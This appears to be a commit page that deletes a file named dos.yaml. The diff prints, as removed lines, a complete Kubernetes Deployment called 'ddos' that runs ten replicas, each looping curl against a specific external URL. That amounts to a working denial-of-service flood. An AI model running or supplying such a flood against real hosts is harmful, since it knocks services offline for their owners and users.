Delete dos.yaml
This commit is contained in:
35
dos.yaml
35
dos.yaml
@@ -1,35 +0,0 @@
|
|||||||
---
|
|
||||||
apiVersion: apps/v1
|
|
||||||
kind: Deployment
|
|
||||||
metadata:
|
|
||||||
name: ddos
|
|
||||||
spec:
|
|
||||||
replicas: 10
|
|
||||||
selector:
|
|
||||||
matchLabels:
|
|
||||||
app: ddos
|
|
||||||
template:
|
|
||||||
metadata:
|
|
||||||
labels:
|
|
||||||
app: ddos
|
|
||||||
spec:
|
|
||||||
topologySpreadConstraints:
|
|
||||||
- maxSkew: 1
|
|
||||||
topologyKey: topology.kubernetes.io/hostname
|
|
||||||
whenUnsatisfiable: ScheduleAnyway
|
|
||||||
labelSelector:
|
|
||||||
matchLabels:
|
|
||||||
app: ddos
|
|
||||||
enableServiceLinks: false
|
|
||||||
containers:
|
|
||||||
- name: ddos
|
|
||||||
image: alpine/k8s:1.24.16@sha256:06f8942d87fa17b40795bb9a8eff029a9be3fc3c9bcc13d62071de4cc3324153
|
|
||||||
command:
|
|
||||||
- /bin/bash
|
|
||||||
- -c
|
|
||||||
- |
|
|
||||||
while [ 1 ]; do
|
|
||||||
curl -L https://memelord-sala.ee-lte-1.codemowers.io
|
|
||||||
done
|
|
||||||
|
|
||||||
|
|
||||||
Reference in New Issue
Block a user